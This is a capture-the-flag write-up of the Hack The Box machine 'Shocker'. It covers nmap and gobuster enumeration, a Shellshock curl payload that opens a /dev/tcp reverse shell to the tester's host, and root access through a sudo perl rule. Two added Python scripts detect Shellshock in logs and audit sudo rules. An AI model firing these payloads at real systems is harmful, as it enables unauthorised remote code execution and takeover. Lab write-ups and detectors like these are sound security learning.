# Shocker Writeup


![](/files/8rUuGhe55h79lr54yu2r)

**Vulnerability Exploited:** <mark style="color:blue;">GNU Bash - 'Shellshock' Environment Variable Command Injection (CVE-2014-6271)</mark>

**System Vulnerable:** 10.10.10.56

**Vulnerability Explanation:** GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock."

**Vulnerability Fix:** Patched versions of GNU Bash have been released to fix this known issue. Details can be found here: <https://security.berkeley.edu/news/shellshock-gnu-bash-remote-code-execution-vulnerability-cve-2014-6271>

**Privilege Escalation Vulnerability:** Insecure service configuration

**Vulnerability Fix:** Always conform to the principle of least privilege and to separation of privileges: a user should not be allowed to run a general-purpose interpreter such as Perl as root via sudo.

**Severity:** <mark style="color:red;">**Critical**</mark>

An initial nmap scan revealed Apache 2.4.18 running on port 80 and OpenSSH 7.2p2 on the non-standard port 2222.

```
# Nmap 7.91 scan initiated Tue Nov 16 19:03:32 2021 as: nmap -sC -sV -v -p- -oN nmap/full 10.10.10.56
Nmap scan report for 10.10.10.56
Host is up (0.34s latency).
Not shown: 65521 closed ports
PORT      STATE    SERVICE VERSION
80/tcp    open     http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp  open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
3398/tcp  filtered sapcomm
10044/tcp filtered unknown
15794/tcp filtered unknown
25723/tcp filtered unknown
29621/tcp filtered unknown
33041/tcp filtered unknown
36919/tcp filtered unknown
40374/tcp filtered unknown
40801/tcp filtered unknown
45501/tcp filtered unknown
48906/tcp filtered unknown
55879/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Nov 16 19:37:19 2021 -- 1 IP address (1 host up) scanned in 2026.90 seconds
```

The Shocker main page is shown below:

![](/files/TNpV9DZ7kR4j5iPpNjRB)

Fuzzing the website to find any existing directories:

```
┌──(root💀kali)-[/root/…/ctf/HTB/linux/shocker]
└─# gobuster dir -u http://10.10.10.56/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -f                   
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Add Slash:               true
[+] Timeout:                 10s
===============================================================
2021/11/16 21:13:50 Starting gobuster in directory enumeration mode
===============================================================
/cgi-bin/             (Status: 403) [Size: 294]
/icons/               (Status: 403) [Size: 292]
```

The /cgi-bin/ directory returns a 403 (You don't have permission to access /cgi-bin/ on this server):

![](/files/69PxL53Fw1Tc2O5gFfbK)

Enumerating further inside the /cgi-bin/ directory, this time looking for files with the extensions "sh" and "cgi":

```
┌──(root💀kali)-[/root/…/ctf/HTB/linux/shocker]
└─# gobuster dir -u http://10.10.10.56/cgi-bin -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x sh,cgi -f
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.56/cgi-bin
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              sh,cgi
[+] Add Slash:               true
[+] Timeout:                 10s
===============================================================
2021/11/16 21:19:12 Starting gobuster in directory enumeration mode
===============================================================
/user.sh              (Status: 200) [Size: 118]
```

Requesting user.sh returns the output of a bash CGI script with the following content:

```
Content-Type: text/plain
 
Just an uptime test script
 
 19:20:42 up  4:24,  0 users,  load average: 0.02, 0.02, 0.00
```

Identified an exploit for Shellshock using searchsploit:

![](/files/QmifreWoVZCWKGltNrZo)

Used an exploit from <https://www.exploit-db.com/exploits/34765> and modified it as shown below:

```
curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /bin/bash -i >& /dev/tcp/10.10.16.8/9001 0>&1" http://10.10.10.56/cgi-bin/user.sh
```

Run the modified exploit:

```
┌──(root💀kali)-[/root/…/ctf/HTB/linux/shocker]
└─# curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.16.8/9001 0>&1' http://10.10.10.56/cgi-bin/user.sh
```

Received a reverse shell on port 9001 as the user shelly:

```
┌──(root💀kali)-[/root/…/ctf/HTB/linux/shocker]
└─# nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.10.56] 52132
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ whoami
whoami
shelly
```
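The reverse shell above was delivered through a header that Apache's mod_cgi copied into an environment variable. As an added example (not part of the original writeup), the Python below runs a Shellshock detector over constructed Apache combined-format access-log lines, flagging the `() {` function-definition marker in the two headers that format records (User-Agent and Referer) and noting whether the request hit a CGI path.

```python
import re
from typing import Dict, List, Optional

# Constructed sample log lines: the 2nd carries the marker in User-Agent,
# the 3rd in Referer; the 1st and 4th are benign.
SAMPLE_LOG = """\
10.10.16.8 - - [16/Nov/2021:21:19:12 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "curl/7.74.0"
10.10.16.8 - - [16/Nov/2021:21:25:03 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 0 "-" "() { :; }; /bin/uname -a"
10.10.16.8 - - [16/Nov/2021:21:26:40 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "() { x; }; echo probe" "Mozilla/5.0"
10.10.16.8 - - [16/Nov/2021:21:27:01 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

# Apache "combined" format: only Referer and User-Agent are logged, so a
# payload placed in Cookie or a custom header would NOT be visible here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Bash's exported-function syntax: "() {" with optional whitespace in between.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Return the named fields of one combined-format line, or None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock(log_text: str) -> List[Dict[str, object]]:
    """Flag every logged header value that carries the Shellshock marker."""
    findings: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line; a real pipeline would count these
        for field in ("ua", "referer"):
            if SHELLSHOCK_RE.search(rec[field]):
                findings.append({
                    "ip": rec["ip"], "ts": rec["ts"], "path": rec["path"],
                    "field": field, "value": rec[field],
                    # Requests to CGI scripts are where the header reaches bash.
                    "cgi": rec["path"].startswith("/cgi-bin/"),
                })
    return findings


if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['path']} [{hit['field']}] {hit['value']!r} cgi={hit['cgi']}")
```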

#### user.txt

```
shelly@Shocker:/home/shelly$ cat user.txt && hostname && whoami && ip addr
cat user.txt && hostname && whoami && ip addr
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Shocker
shelly
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:b9:6e:f9 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.56/24 brd 10.10.10.255 scope global ens33
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:feb9:6ef9/64 scope link
       valid_lft forever preferred_lft forever
```

Run the sudo -l command to determine which commands the user shelly may run with sudo.

```
shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
 
User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
```

Since Perl can run as root without a password, use it to spawn a root shell:

```
shelly@Shocker:/home/shelly$ sudo /usr/bin/perl -e 'exec "/bin/sh";'
sudo /usr/bin/perl -e 'exec "/bin/sh";'
id
uid=0(root) gid=0(root) groups=0(root)
```
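The misconfiguration is that sudo grants a general-purpose interpreter to a low-privileged user. As an added example (not part of the original writeup), the Python below parses the `sudo -l` output shown above and flags rules that hand root an interpreter, editor or pager capable of executing arbitrary commands; a second, hypothetical rule for systemctl is included to show a rule that does not trip the check.

```python
import os
import re
from typing import Dict, List

# Copy of the page's sudo -l output plus one constructed, harmless rule.
SUDO_L_OUTPUT = r"""Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
    (root) /usr/bin/systemctl restart apache2
"""

# Programs that can run arbitrary commands once started as root (perl is the
# one used on this box; the rest are the usual GTFOBins-style suspects).
SHELL_CAPABLE = {
    "perl", "python", "python2", "python3", "ruby", "bash", "sh", "dash",
    "vi", "vim", "nano", "less", "more", "man", "awk", "find", "env",
}

# "(runas) [TAG: ...] command" lines; Defaults and header lines do not match.
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def parse_sudo_l(output: str) -> List[Dict[str, object]]:
    """Extract the per-command rules from `sudo -l` output."""
    entries: List[Dict[str, object]] = []
    for line in output.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        entries.append({"runas": m.group("runas").strip(),
                        "nopasswd": "NOPASSWD" in tags,
                        "cmd": m.group("cmd").strip()})
    return entries


def audit(entries: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Return the rules that give root-level arbitrary command execution."""
    findings = []
    for e in entries:
        cmd = str(e["cmd"])
        prog = os.path.basename(cmd.split()[0])           # first token of the rule
        as_root = str(e["runas"]).split(":")[0].strip() in ("root", "ALL")
        if as_root and (cmd == "ALL" or prog in SHELL_CAPABLE):
            findings.append({**e, "program": prog,
                             "severity": "critical" if e["nopasswd"] else "high",
                             "reason": f"{prog} can execute arbitrary commands as root"})
    return findings


if __name__ == "__main__":
    for f in audit(parse_sudo_l(SUDO_L_OUTPUT)):
        print(f"{f['severity'].upper()}: ({f['runas']}) {f['cmd']} -> {f['reason']}")
```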

#### root.txt

```
root@Shocker:~# cat root.txt && hostname && whoami && ip addr
cat root.txt && hostname && whoami && ip addr
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Shocker
root
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:b9:6e:f9 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.56/24 brd 10.10.10.255 scope global ens33
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:feb9:6ef9/64 scope link
       valid_lft forever preferred_lft forever
```
